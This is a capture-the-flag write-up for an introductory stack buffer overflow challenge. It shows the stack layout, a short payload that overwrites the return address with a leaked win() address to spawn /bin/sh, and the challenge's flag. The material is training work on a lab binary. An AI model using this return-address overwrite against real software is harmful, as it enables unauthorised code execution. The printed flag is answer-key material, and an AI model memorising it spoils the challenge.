Binary Exploitation
Easy
100 points

Buffer Overflow Intro

Recuite 2025 - HCMUS
6 tháng 10, 2025
Buffer Overflow
RIP Control
Stack
Recuite 2025 - HCMUS
Binary Exploitation

Buffer Overflow Intro - Write-up

Challenge Information

  • Category: Binary Exploitation
  • Difficulty: Intro/Easy
  • Protection: PIE, NX, IBT/SHSTK enabled; No Stack Canary

Analysis

Binary Behavior

  1. Prints address of win function (PIE enabled, changes every run)
  2. Prints stack layout
  3. Receives 256 bytes input into 16-byte buffer → Buffer Overflow!

Stack Layout

Offset  | Content
--------|------------------
0x00    | Buffer (16 bytes)
0x10    | Saved RBP (8 bytes)
0x18    | Return Address (8 bytes)

Win Function

At offset 0x1209, executes /bin/sh via execve:

void win() {
    char *args[] = {"/bin/sh", NULL};
    execve(args[0], args, NULL);
}

Exploitation

Payload Structure

payload = b"A" * 24          # Fill buffer + RBP
payload += p64(win_addr)     # Return address → win

Exploitation Steps

  1. Parse win function address from output
  2. Construct payload: 16 bytes buffer + 8 bytes RBP + 8 bytes win_addr
  3. Send payload
  4. When function returns, jumps to win() → shell!
  5. Send command cat flag.txt

Key Notes

  • IBT enabled → Can only return to functions with endbr64 instruction
  • No RET gadget needed for alignment (win handles it)
  • Shell is spawned after exploitation, need to send commands

Flag

BPCTF{noi_tinh_yeu_bat_dau_4130218ceb6f154233bfd7c7fab262d7}

Key Takeaways

  • Basic buffer overflow: overwrite return address
  • PIE does not prevent exploitation if address is leaked
  • IBT limits jump targets to valid function entries
  • Stack canaries only effective if not leaked
100
Points
Easy
Difficulty
Binary Exploitation
Category

More Binary Exploitation Challenges

Canary Intro

Easy
150 pts

PIE Intro

Medium
200 pts

GOT Intro

Medium
250 pts